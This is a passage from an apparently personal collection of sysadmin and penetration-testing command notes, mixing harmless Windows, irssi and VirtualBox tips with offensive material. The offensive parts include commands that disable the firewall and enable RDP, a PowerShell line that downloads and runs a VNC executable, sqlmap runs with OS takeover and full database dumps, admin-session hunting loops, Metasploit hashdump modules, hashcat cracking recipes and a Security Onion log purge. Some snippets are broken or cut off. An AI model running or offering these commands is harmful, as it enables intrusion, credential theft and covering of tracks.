2079reg add "HKCU\Control Panel\Mouse" /v "MouseThreshold2" /d "0" /f
2080taskkill /im explorer.exe /f
2081explorer
2082
208307/03/2013 - How can I prevent Ask.com Toolbar from being installed every time Java is updated
2084Reg Add "HKLM\SOFTWARE\JavaSoft" /V "SPONSORS" /D DISABLE /T reg_sz /F
2085Reg Add "HKLM\SOFTWARE\Wow6432Node\JavaSoft" /V "SPONSORS" /D DISABLE /T reg_sz /F
2086
2087
2088
2089
2090
209106/30/2013 - Disable Skydrive/Upload Center in Office 2013
2092Taskkill /F /IM MSOSYNC.EXE
2093Taskkill /F /IM MSOUC.EXE
2094
2095Reg Add "HKCU\software\policies\microsoft\office\common\webintegration" /V "webintegrationenabled" /D 0 /T REG_DWORD /F
2096Reg Add "HKLM\software\policies\microsoft\office\common\webintegration" /V "webintegrationenabled" /D 0 /T REG_DWORD /F
2097Reg Add "HKCU\Software\Microsoft\Office\15.0\Common\SignIn" /V "SignInOptions" /D 3 /T REG_DWORD /F
2098Reg Add "HKLM\Software\Microsoft\Office\15.0\Common\SignIn" /V "SignInOptions" /D 3 /T REG_DWORD /F
2099del /s/q c:\MSOUC.EXE
2100del /s/q c:\MSOSYNC.EXE
2101
2102# BS buttons
2103http://instantrimshot.com/classic/?sound=coughbullshit
2104
2105Penetration Testing Frameworks:
2106
21071. iOS
2108 Tools:- iNalyzer (cydia), isafePlay, Burp for manipulating iOS apps.
2109 And follow the traditional assessment (https://www.owasp.org/index.php/IOS_Application_Security_Testing_Cheat_Sheet)
21102. Android
2111 SmartPhone PenTest Framework (http://www.bulbsecurity.com/smartphone-pentest-framework/), Android SDK, OWASP LAPSE+, Burp can be used to conduct the testing. SPF can also be used to integrate with metasploit,SET etc.
21123. Windows Phone 7 and below
2113 Windows SDK (need a developer account) and Charles/Burp proxy is a good combination to conduct the assessments.
21144. BlackBerry - does provide a rigorous security screening process that submitted apps must pass in order to be listed in the store, but still we can still use the traditional android framework to test the apps designed for BB ( limited to java).
2115
2116
2117# password manager command line for windows key manager / stored usernames and passwords windows 7
2118rundll32.exe keymgr.dll,KRShowKeyMgr
2119control keymgr.dll
2120
2121# chown xcalcs calcs
2122FOR /F "delims==" %%A IN ('dir /b') DO cacls.exe "%%A" /T /E /G everyone:f
2123find . -maxdepth 3 -exec cacls.exe '{}' /T /E /G everyone:f \;
2124
2125# windows compatibility mode compat command line.
2126set __COMPAT_LAYER=WinXPSP3
2127
2128# fix windows boot loader
2129ms-sys --mbr /dev/sdx
2130# or
2131apt-get install syslinux
2132dd if=/usr/lib/syslinux/mbr.bin of=/dev/sdx
2133# or
2134apt-get install mbr
2135install-mbr -i n -p D -t 0 /dev/sdx
2136
2137# enable fix firewall
2138netsh firewall set opmode ENABLE
2139netsh advfirewall set currentprofile state on
2140
2141
2142
2143#disable windows firewall windows 7
2144netsh advfirewall set AllProfiles state off
2145
2146net stop MpsSvc
2147
2148sc config mpssvc start= Disabled
2149
2150
2151#enable RDP over CLI
2152reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2153
2154# RDP timeout !!!
2155reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MaxDisconnectionTime /t REG_DWORD /d "3600000" /f
2156reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MaxIdleTime /t REG_DWORD /d "10800000" /f
2157reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\DefaultUserConfiguration" /v MaxDisconnectionTime /t REG_DWORD /d "3600000" /f
2158reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\DefaultUserConfiguration" /v MaxIdleTime /t REG_DWORD /d "10800000" /f
2159reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\Console" /v MaxDisconnectionTime /t REG_DWORD /d "3600000" /f
2160reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\Console" /v MaxIdleTime /t REG_DWORD /d "10800000" /f
2161
2162reg add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp" /v MaxDisconnectionTime /t REG_DWORD /d "3600000" /f
2163reg add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp" /v MaxIdleTime /t REG_DWORD /d "10800000" /f
2164reg add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server\DefaultUserConfiguration" /v MaxDisconnectionTime /t REG_DWORD /d "3600000" /f
2165reg add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server\DefaultUserConfiguration" /v MaxIdleTime /t REG_DWORD /d "10800000" /f
2166reg add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\Console" /v MaxDisconnectionTime /t REG_DWORD /d "3600000" /f
2167reg add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\Console" /v MaxIdleTime /t REG_DWORD /d "10800000" /f
2168
2169reg add "HKLM\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\RDP-Tcp" /v MaxDisconnectionTime /t REG_DWORD /d "3600000" /f
2170reg add "HKLM\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\RDP-Tcp" /v MaxIdleTime /t REG_DWORD /d "10800000" /f
2171reg add "HKLM\SYSTEM\ControlSet002\Control\Terminal Server\DefaultUserConfiguration" /v MaxDisconnectionTime /t REG_DWORD /d "3600000" /f
2172reg add "HKLM\SYSTEM\ControlSet002\Control\Terminal Server\DefaultUserConfiguration" /v MaxIdleTime /t REG_DWORD /d "10800000" /f
2173reg add "HKLM\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\Console" /v MaxDisconnectionTime /t REG_DWORD /d "3600000" /f
2174reg add "HKLM\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\Console" /v MaxIdleTime /t REG_DWORD /d "10800000" /f
2175
2176
2177
2178
2179# kill RDP logins and force logoff sessionts
2180qwinsta
2181rwinsta
2182# logoff sessions
2183logoff 1
2184
2185
2186# psexec winexe
2187 winexe --user admin --password=password //192.168.1.250 c:\\windows\\system32\\nnplus.bat
2188
2189# java tricks
2190javascript:document.body.contentEditable='true'; document.designMode='on'; void 0
2191javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);
2192
2193
2194
2195# open with in ubuntu
2196# gedit ~/.gnome2/nautilus-scripts/Open\ with\ gedit
2197filesall=."
2198while [ $# -gt 0 ]
2199do
2200files=`echo .$1. | sed .s/ /\?/g.`
2201filesall=.$files $filesall.
2202shift
2203done
2204mplayer -vc ffvc1vdpau,ffwmvvdpau,ffh264vdpau,ffmpeg12vdpau -vo vdpau -ac hwdts,hwac3, -ao alsa:device=spdif -cache 8192 -fs -zoom -quiet $filesall&
2205
2206
2207#irssi
2208#/NETWORK ADD irc.freenode.net -autosendcmd "/^msg nickserv ident password;wait 2000"
2209/NETWORK ADD irc.freenode.net
2210/SERVER ADD -auto -network irc.freenode.net irc.freenode.net 6667
2211/CHANNEL ADD -auto #infonomicon irc.freenode.net
2212
2213
2214# irssi aliases in conf
2215 1 = "/^msg NickServ ghost operat0r password";
2216 2 = "/^nick operat0r";
2217 3 = "/^msg NickServ identify operat0r password";
2218 4 = "/^msg NickServ identify password";
2219m = "wait 5000;/window 2;wait 5000;/window show 2;wait 9000;/window show 3;wait 9000;/window show 4;wait 9000;/win balance;wait 5000;/clear -all";
2220
2221
2222# example image dump
2223wget -q --no-clobber -P pics -H -nd -r -Dimages.4chan.org -A '.jpg,.jpeg,.png,.gif,' -U 'rmccurdyDOTcom' -e robots=off http://boards.4chan.org/b/
2224
2225
2226
2227# purge security onion
2228nsm_sensor_clean --force-yes
2229rm -rf /nsm/sensor_data/*/dailylogs/*
2230sguil-db-purge
2231rm -Rf /nsm/bro/spool/tmp/
2232
2233
2234
2235# disable ipv6 win7
2236netsh interface teredo set state disabled
2237netsh interface ipv6 6to4 set state state=disabled undoonstop=disabled
2238netsh interface ipv6 isatap set state state=disabled
2239
2240#disable firefox plugin check : in about:config add FAIL in front of plugins.update.url and rename the DLL or plugin restart FF !
2241
2242# exploit-db.com checkout svn checkout
2243wget exploit-db.com/archive.tar.bz2
2244
2245# weather radar on liner wunderground
2246radblast-aws.wunderground.com/cgi-bin/radar/WUNIDS_map?station=FFC&brand=wui&num=10&delay=15&type=N0R&frame=0&scale=1.000&noclutter=0&t=1361486454&lat=34.02500916&lon=-84.31282806&label=RMCCURDY.COM&showstorms=0&map.x=400&map.y=240¢erx=400¢ery=240&transx=0&transy=0&showlabels=1&severe=0&rainsnow=0&lightning=0&smooth=0
2247
2248#powershell
2249powershell (new-object System.Net.WebClient).DownloadFile('http://rmccurdy.com/scripts/quickvnc.exe','%TEMP%\quickvnc.exe');Start-Process "%TEMP%\quickvnc.exe"
2250
2251
2252
2253# NX client FreeNX
2254# line to use in custom for ubuntu
2255gnome-session --session=ubuntu-2d
2256
2257
2258# stupid webalizer ...
2259 find /var/log/apache2/access.log* -exec webalizer -c /etc/webalizer/webalizer.conf '{}' \;
2260
2261
2262# wipe irssi conf and setup
2263rm -Rf ~./.irssi
2264/NETWORK ADD synirc
2265/SERVER ADD -auto -network synirc irc.synirc.net 6667
2266/CHANNEL ADD -auto #newznab synirc
2267/SET autolog ON
2268/SET autolog_level ALL
2269
2270
2271/alias hideadd eval set activity_hide_targets $activity_hide_targets $-
2272/alias hideclear set -c activity_hide_targets
2273/alias hidelevels.clear set -c activity_hide_level
2274/alias hidelevels.set set activity_hide_level parts joins quits nicks modes
2275/alias hidelist set activity_hide_targets
2276/alias hideset set activity_hide_targets $-
2277
2278/hideadd
2279/hideclear
2280/hidelevels.clear
2281/hidelevels.set
2282/hidelist
2283/hideset
2284/ignore -channels #newznab * JOINS PARTS QUITS NICKS
2285
2286
2287
2288
2289# virtualbox vbox headless vbs script
2290Set WshShell = WScript.CreateObject("WScript.Shell")
2291obj = WshShell.Run("C:\Progra~1\Oracle\VirtualBox\VBoxHeadless.exe -s nnplus64", 0)
2292set WshShell = Nothing
2293
2294
2295# compress dynamic disk in virtualbox
2296dd if=/dev/zero of=/zerofile; sudo rm /zerofile
2297dd if=/dev/zero of=/zerofile; sudo rm /zerofile
2298VBoxManage modifyhd nnplus2.vdi -compact
2299
2300
2301
2302# start vbox vm
2303VBoxHeadless -s nnplus
2304
2305# start a vm hidden/headless
2306powershell start-process 'C:\Program Files\Oracle\VirtualBox\vboxheadless' '-s nnplus64' -WindowStyle Hidden
2307
2308
2309# wipe snapshot
2310VBoxManage snapshot nnplus take clean
2311
2312# shutdown via cmd
2313VBoxManage controlvm "nnplus" powerof
2314
2315
2316# backup conf files quickly before update
2317locate "*.conf"|xargs tar -zcpf "/home/mythtv/CONF_ZIP_`date +%Y%m%d`.tar.gz"
2318
2319IP to Site
2320http://www.ip866.com/reverse.aspx
2321http://www.myipneighbors.com
2322http://www.yougetsignal.com/tools/web-sites-on-web-server
2323http://ip.wen.la
2324http://www.114best.com/ip/
2325http://www.zzstat.com/ip_domain.html
2326http://whois.webhosting.info
2327http://www.bm8.com.cn/myip
2328http://www.seores.com/search/checkdomainfromip.asp
2329http://tools.dxsheng.com/IpSnap
2330http://tool.gimoo.net/iphost
2331http://www.yw123.com/ip.asp
2332http://cn.bing.com/search?q=ip%3A209.195.132.165
2333http://www.ip138.com+
2334
2335hashs
2336href="http://hashcrack.com
2337http://www.lmcrack.com
2338http://passcracking.com
2339http://www.cmd5.com
2340http://xmd5.org
2341http://md5.rednoize.com
2342http://www.t00ls.net/tools/md5
2343http://www.hashchecker.com/index.php?_sls=search_hash
2344http://md5.mmkey.com
2345http://gdataonline.com/seekhash.php">GdataOnline</a><br>
2346http://cha88.cn/safe/md5.php
2347http://www.md5crack.com
2348http://www.md5.com.cn
2349http://www.objectif-securite.ch/en/products.php
2350
2351#db ports ?
2352-T3 -p 1521-1527,3306-3310,1433-1437,3200-3299,3300-3399,32000-32990,33000-33990
2353
2354# mount images also checck sleuthkit.org/autopsy/
2355First I check the disk geometry with sfdisk -l -u -S *
2356Then look for the start sector of the partition, e.g. 5
2357
2358mount -o loop,offset=$((5 * 512)) [image] /mnt
2359mount the partition to /mnt (replace 5 with the output from sfdisk)
2360
2361mount -t ntfs -o ro,offset=32256,loop,umask=007,gid=4 /media/IOMEGA_BKUP/CLIENT-MX/APPSERVER.dd appserver/
2362
2363mount -t ntfs -o ro,offset=41126400,loop,umask=007,gid=4 /media/IOMEGA_BKUP/CLIENT-MX/RH-CLIENT-MX.dd rh-CLIENT-MX/part1/
2364mount -t ntfs -o ro,offset=12930172416,loop,umask=007,gid=4 /media/IOMEGA_BKUP/CLIENT-MX/RH-CLIENT-MX.dd rh-CLIENT-MX/part2/
2365
2366mount -t ntfs -o ro,offset=32256,loop,umask=007,gid=4 /media/IOMEGA_BKUP/CLIENT-MX/SERVERSQL.dd serversql
2367mount -t ntfs -o ro,offset=32256,loop,umask=007,gid=4 /media/IOMEGA_BKUP/CLIENT-MX/SERVERSQL2.dd serversql2/
2368
2369
2370
2371# nethackit.sh.txt metasploit scanners
2372auxiliary/scanner/ftp/anonymous
2373auxiliary/scanner/ftp/ftp_login
2374auxiliary/scanner/snmp/snmp_enum
2375auxiliary/scanner/snmp/snmp_enumshares
2376auxiliary/scanner/snmp/snmp_enumusers
2377auxiliary/scanner/snmp/snmp_login
2378auxiliary/scanner/mssql/mssql_hashdump
2379auxiliary/scanner/oracle/oracle_login
2380auxiliary/scanner/oracle/sid_brute
2381auxiliary/scanner/smtp/smtp_enum
2382auxiliary/scanner/smtp/smtp_version
2383auxiliary/scanner/telnet/telnet_login
2384auxiliary/scanner/mysql/mysql_hashdump
2385auxiliary/scanner/mysql/mysql_login
2386auxiliary/scanner/mysql/mysql_version
2387auxiliary/scanner/smb/smb_version
2388auxiliary/scanner/smb/smb_enumusers
2389auxiliary/scanner/smb/smb_login
2390auxiliary/scanner/smb/smb_enumshares
2391auxiliary/scanner/nfs/nfsmount
2392auxiliary/scanner/vnc/vnc_login
2393auxiliary/scanner/vnc/vnc_none_auth
2394auxiliary/scanner/pop3/pop3_version
2395auxiliary/scanner/pop3/pop3_login
2396auxiliary/scanner/http/http_login
2397auxiliary/scanner/http/dir_scanner
2398auxiliary/scanner/http/dir_scanner
2399auxiliary/scanner/http/http_version
2400auxiliary/scanner/http/robots_txt
2401auxiliary/scanner/http/apache_userdir_enum
2402auxiliary/scanner/http/blind_sql_query
2403auxiliary/scanner/http/cisco_ios_auth_bypass
2404auxiliary/scanner/http/error_sql_injection
2405auxiliary/scanner/http/files_dir
2406auxiliary/scanner/http/jboss_vulnscan
2407auxiliary/scanner/http/web_vulndb
2408auxiliary/scanner/ssh/ssh_login
2409auxiliary/scanner/ssh/ssh_login_pubkey
2410auxiliary/scanner/ssh/ssh_version
2411auxiliary/scanner/sip/enumerator
2412auxiliary/scanner/sip/enumerator_tcp
2413auxiliary/scanner/sip/sipdroid_ext_enum
2414
2415# grep password words in a file and shot 4 lines before and after grep images AIX images
2416egrep -A 4 -B 4 -ia '(passwd|password|shadow)' someAIX_NIM_DUMP.image.110512 > out.txt
2417# perform strings on the output so we can read it ..
2418strings out.txt > out2.txt
2419
2420
2421# Oracle 7-10g DES(ORACLE) Oclhashcat_plus GPU
2422# input : F35C90763516369B:DEV_MDS
2423cudaHashcat-plus64.exe --hash-type 3100 C:\egb\ocl\ORACLE.txt C:\egb\Dictionaries\PasswordsPro.dic C:\egb\Dictionaries\Xploitz_clean.lst
2424
2425#oracle dump ref defcon-17-chris_gates-breaking_metasploit.pdf and win32exec.rb in MSF
2426select owner, table_name, column_name,data_type,data_length, data_precision,data_default, avg_col_len, char_length from sys.dba_tab_columns where owner not in ('APPQOSSYS','ADUSER','CTXSYS','DIP','DBSNMP','MDSYS','OUTLN','SYS','SYSTEM','TEST','XDB','WMSYS','XSNULL') AND avg_col_len>0
2427
2428# oracle
2429nmap -n --script=oracle-sid-brute -p 1521-1560 -iL oracle -A
2430
2431# mount smb share with runas/savecred ... yes this is bad idea!
2432runas /u:admin /savecred "net use Z: \\192.168.1.151\myth\h /del"
2433runas /u:admin /savecred "net use \\192.168.1.151\myth\h /del"
2434runas /u:admin /savecred "net use z: \\192.168.1.151\myth\h /user:mythtv PASSSWORDHERE"
2435
2436
2437
2438
2439Use takeown to take ownership of the file
2440takeown /r /d y /f *
2441Follow it up with icacls set the access control list
2442icacls * /t /grant Everyone:F
2443
2444
2445#So it appears Google translator blocks English to English translating ( aka super fast web proxy ). So guess what ? Just change the source language it to valid English language code like en-au
2446
2447http://translate.google.com/translate?sl=af&tl=en-au&js=n&prev=_t&hl=en&ie=UTF-8&layout=2&eotf=1&u=http%3A%2F%2Frmccurdy.com
2448
2449
2450
2451#gawk awk system exec commands with output of awk
2452/rmccurdy/scripts/web_dump.sh:echo $i|sed 's/,/ /g' | gawk '{system ("curl -k --location-trusted -m 3 -L -o " $1"_"$2".html https:\/\/"$1":"$2 )}' 2>&1 &
2453/rmccurdy/scripts/web_dump.sh:echo $i|sed 's/,/ /g' | gawk '{system ("curl -k --location-trusted -m 3 -L -o " $1"_"$2".html http:\/\/"$1":"$2 )}' 2>&1 &
2454
2455# filename= in header
2456curl -O -J -L URL
2457
2458
2459#Nmap Idle Scanning.
2460use auxiliary/scanner/ip/ipidseq
2461nmap 192.168.1.250 -top-ports 9 -D RND:120 -T4 -ff
2462
2463# wmic fu search systems for running 'exe' to hijack
2464FOR /F "delims==" %%A IN ('type ips.txt') DO wmic /Node:%%A wmic /user:username /password:yourpassword /FAILFAST:ON process where "name like '%.exe'" call getowner
2465
2466# wmic fu to dump VPN event logs cisco
2467wmic nteventlog where filename='cisco anyconnect vpn client' backupeventlog %USERPROFILE%\desktop\Cisco_AnyConnect_VPN_CLient_%USERNAME%_%COMPUTERNAME%.evt
2468
2469
2470Netsess.exe .h
2471
2472FOR /F %i in (dcs.txt) do @echo [+] Querying DC %i && @netsess -h %i 2>nul > sessions.txt &&
2473FOR /F %a in (admins.txt) DO @type sessions.txt | @findstr /I %a
2474
2475FOR /F %i in (ips.txt) DO @echo [+] %i && @tasklist /V /S %i /U user /P password 2>NUL > output.txt &&
2476FOR /F %n in (names.txt) DO @type output.txt | findstr %n > NUL && echo [!] %n was found running a process
2477
2478on %i && pause
2479
2480for /F %i in (ips.txt) do @echo [+] Checking %i && nbtstat -A %i 2>NUL >nbsessions.txt && FOR /F %n in
2481
2482(admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i
2483
2484for /F %i in (ips.txt) do @echo [+] Checking %i && nbtscan -f %i 2>NUL >nbsessions.txt && FOR /F %n in
2485
2486(admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i
2487
2488
2489#uwall.tv direct link
2490http://uwall.tv/player_lightbox.php?q=gangnam%20style
2491
2492# cat /bin/RAND
2493IFS=$'\n'
2494
2495for fname in `find . -type f `
2496do
2497 mv "$fname" $RANDOM$RANDOM
2498done
2499
2500
2501
2502# burp in win7 etc ..
2503run as administrator
2504Solution was to add the "-Djava.net.preferIPv4Stack=true" flag, so the following entry in my .bat file works now:
2505
2506# John the Ripper Password Cracker (Fast Mode)
2507# see also :
2508#
2509# auxiliary/analyze/jtr_aix
2510# auxiliary/analyze/jtr_linux
2511# auxiliary/analyze/jtr_mssql_fast
2512# auxiliary/analyze/jtr_mysql_fast
2513# auxiliary/analyze/jtr_oracle_fast
2514# auxiliary/analyze/jtr_unshadow
2515# auxiliary/analyze/postgres_md5_crack
2516
2517
2518use auxiliary/analyze/jtr_crack_fast
2519set Munge 0
2520run# got new ebooks with roubble \n\n or \r\r
2521For converting double newlines (\n\n) to a single newline (\n):
2522sed -e 'N;P;s/\n$//;D'
2523
2524For converting double carriage returns (\r\r) to a single carriage
2525return (\r):
2526sed -e 's/\r\r/\r/g'
2527
2528tr(1) has the -s option, but that will squeeze multiple (possibly more
2529than two) occurrences to a single occurrence.
2530
2531This can also be handled in the more general case with perl(1), e.g.:
2532perl -pe '
2533BEGIN {$/="\n\n";}
2534s/\n\n/\n/o;
2535
2536john 1337 speak worlist gen:
2537
2538
2539
2540The default john.conf includes some rules like that, enabled for "single crack" mode only by default. You may copy the lines between these two comments:
2541# The following 3l33t rules are based on original Crack's dicts.rules
2542l/asa4[:c]
2543l/ese3[:c]
2544l/lsl1[:c]
2545l/oso0[:c]
2546l/sss$[:c]
2547...
2548l/asa4/ese3/lsl1/oso0/sss$[:c]
2549# Now to the prefix stuff...
2550into the [List.Rules:Wordlist] section to have them enabled for wordlist mode as well. usage: john -w=wordlist --stdout --rules
2551
2552
2553# slow this or run it over proxychains etc ..
2554for i in `cat in` ;do python metagoofil.py -d $i -l 100 -f all -o micro_$i.html -t micro-files_$i;sleep 60;done
2555for i in `cat in` ;do ./theHarvester.py -d $i -b google;sleep 60;done
2556
2557
2558# hybrid mask attack hashcat not all special characters
2559?u?l?d!@#$-().*_
2560
2561# grep 8 or more char long characterslength
2562grep '[^\ ]\{8,\}'
2563# sed 8 chars long characters long length
2564sed -n -e '/^.\{8\}$/p''
2565
2566
2567# fix path Environment Variables path issues in M$
2568sysdm.cpl
2569C:\Program Files\w3af;C:\Program Files;C:\winxp;C:\winxp\System32;c:\program files\nmap;C:\Program Files\RSA SecurID Token Common;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Strawberry\c\bin;C:\Strawberry\perl\site\bin;C:\Strawberry\perl\bin
2570
2571
2572# nmap SMB check unsafe
2573nmap --script smb-check-vulns.nse --script-args=unsafe=1 -p445 192.168.1.0/24 --open
2574
2575# openvas cioent
2576# Update your distro
2577apt-get update && apt-get dist-upgrade
2578
2579# Install openvas server and client software + security plugins
2580apt-get install openvas-server openvas-client \
2581 openvas-plugins-base openvas-plugins-dfsg
2582
2583# Update the vuln. database
2584openvas-nvt-sync
2585
2586Add a user that you're going to use from the client, to login:
2587
2588openvas-adduser
2589
2590Here, you'll add a user/pass combination.
2591
2592When prompted to add a 'rule' - I allow my user to do everything. The rules allow/disallow scanning of hosts. If you want you can let bob scan 192.168.0.0/24 or whatever. I want my user to scan all, so when prompted, simply enter
2593
2594default accept
2595
2596Now, fire up the server. Note that the first time you run, it loads all those checks into memory so it takes a LONG time for the server to actually start.
2597
2598/etc/init.d/openvas-server start
2599
2600Now, you can start scanning. Create a file with IP's and/or hostnames that your client will feed to the server to scan. Something like this:
2601
2602192.168.1.5
2603www.mydomain.com
2604dns.mydomain.com
260510.1.19.0/24
2606
2607etc.
2608
2609The server listens on port: 9390 by default so you'll want to tell your client to connect there. Once you have the file created, you can kick off your scan like this:
2610
2611OpenVAS-Client -q 127.0.0.1 9390 admin scanme.txt -T html \
2612 ~/Desktop/openvas-output-`date`.html
2613
2614You'll be prompted to accept the SSL certificate, go ahead, it's automagically created by the pkg when it's installed. Then, open that file in a browser when it's done and start going through it. Be warned, scanning is very hostile so you should really only scan your own systems.. and those of your enemies.
2615
2616
2617# sqlmap notes .. also check out Havij 1.15 - Advanced SQL Injection
2618
2619--wizard
2620--search -C pass,pwd,ssn
2621
2622
2623/pentest/database/sqlmap/sqlmap.py -u "https://tZZZZZZ.com/ZZZZZ/Default.aspx" --data="__VIEWSTATE=%ZZZZZZZZ&btnContinue=Continue" --os-pwn --msf-path /pentest/exploits/framework
2624
2625/pentest/database/sqlmap/sqlmap.py -u "http://ZZZZ4/forgotpass.aspx" --data="__VIEWSTATE=%2FZZZZZZ&email=a&submit=Password" --dump-all --exclude-sysdbs
2626
2627
2628# for use with burpsuite and NTLM stop and threads also good stuff
2629/bin/python2.7.exe sqlmap.py --start=1 --stop=10 --threads=10 -p Batch_dt --dbms=mssql --proxy="http://localhost:8080" -u 'http://yaySQLI?Batch_dt=8%2f12%2f2015&Batch_nbr=1&Loc=MOB' --dump-all --exclude-sysdbs
2630
2631
2632
2633#oclHashcat plus Support List :
2634
2635# scripts !
2636http://itsecblog.net/downloads/batchcrack.sh
2637http://rmccurdy.com/scripts/batchcrack_rmccurdy.bat
2638
2639number PSA hashcat (0.39b24) oclHashcat-plus (0.08b25) oclHashcat-lite (0.10b9)
26400 MD5 x x x
26411 *md5($pass.$salt) (see 11) x
26422 *md5($salt.$pass) (see 21) x
26433 *md5(md5($pass)) (see 2600) x
26444 *md5(md5(md5($pass))) x
26455 *vBulletin < v3.8.5 (see 2611) x
26466 *md5(md5($salt).$pass) (see 2811) x
26477 *md5($salt.md5($pass)) x
26488 *md5($salt.$pass.$salt) x
26499 *md5(md5($salt).md5($pass)) x
265010 *md5(md5($pass).md5($salt)) x x
265111 *md5($salt.md5($salt.$pass)) x
265211 Joomla x x
265312 *md5($salt.md5($pass.$salt)) x
265415 *vBulletin > v3.8.5 (see 2711) x
265521 osCommerce, xt:Commerce x
265630 *md5($username.0.$pass) x
265731 *md5(strtoupper(md5($pass))) x
2658100 SHA1 x x x
2659101 nsldap, SHA-1(Base64), Netscape LDAP SHA x x
2660101 *sha1($pass.$salt) x
2661102 *sha1($salt.$pass) x
2662103 *sha1(sha1($pass)) x
2663104 *sha1(sha1(sha1($pass))) x
2664105 *sha1(strtolower($username).$pass) (see 121) x
2665110 *sha1($pass.$salt) x
2666111 nsldaps, SSHA-1(Base64), Netscape LDAP SSHA x x
2667112 Oracle 11g x x
2668121 SMF > v1.1 x
2669122 OSX v10.4, v10.5, v10.6 x
2670131 MSSQL(2000) x x
2671132 MSSQL(2005) x x
2672200 MySQL323 x
2673300 MySQL >=4.1 x x x
2674400 phpass, MD5(Wordpress), MD5(phpBB3) x x
2675500 md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5 x x
2676600 *SHA-1(Base64) (see 101) x
2677700 *SSHA-1(Base64) (see 111) x
2678800 SHA-1(Django) x
2679900 MD4 x x x
26801000 NTLM x x x
26811100 Domain Cached Credentials, mscash x x x
26821200 MD5(Chap) x
26831300 MSSQL x
26841400 SHA256 x x x
26851500 descrypt, DES(Unix), Traditional DES x x
26861600 md5apr1, MD5(APR), Apache MD5 x x
26871700 SHA512 x x
26881800 SHA-512(Unix) x
26891900 SL3 x
26902100 Domain Cached Credentials2, mscash2 x
26912400 Cisco-PIX MD5 x x
26922500 WPA/WPA2 x
26932600 Double MD5 x x
26942611 vBulletin < v3.8.5 x x
26952711 vBulletin > v3.8.5 x x
26962811 IPB2+, MyBB1.2+ x x
26973000 LM x x
2698
2699 *
2700 * Depreached,
2701
2702
2703Example :
2704set BIN=oclHashcat-plus64
2705set OPTS=--attack-mode 3 --gpu-accel 160 --gpu-loops 1024 --gpu-watchdog 0 --runtime 30 --force --custom-charset1 ?l?d?s?u
2706
2707%BIN% %OPTS% --hash-type 0 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
2708%BIN% %OPTS% --hash-type 11 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
2709%BIN% %OPTS% --hash-type 21 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aa ?1?1?1?1?1?1?1?1
2710%BIN% %OPTS% --hash-type 100 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
2711%BIN% %OPTS% --hash-type 101 {SHA}aaaaaaaaaaaaaaaaaaaaaaaaaaQ= ?1?1?1?1?1?1?1?1
2712%BIN% %OPTS% --hash-type 111 {SSHA}aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaQ== ?1?1?1?1?1?1?1?1
2713%BIN% %OPTS% --hash-type 112 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaaaaaaa ?1?1?1?1?1?1?1?1
2714%BIN% %OPTS% --hash-type 121 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:a ?1?1?1?1?1?1?1?1
2715%BIN% %OPTS% --hash-type 122 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
2716%BIN% %OPTS% --hash-type 131 0x0100aaaaaaaa0000000000000000000000000000000000000000aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
2717%BIN% %OPTS% --hash-type 132 0x0100aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
2718%BIN% %OPTS% --hash-type 300 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
2719%BIN% %OPTS% --hash-type 400 $H$9aaaaaaaaaaaaaaaaaaaaaaaaaaaaa1 ?1?1?1?1?1?1?1?1
2720%BIN% %OPTS% --hash-type 500 $1$aaaaaaaa$aaaaaaaaaaaaaaaaaaaaa1 ?1?1?1?1?1?1?1?1 --gpu-loops 1000
2721%BIN% %OPTS% --hash-type 900 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
2722%BIN% %OPTS% --hash-type 1000 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
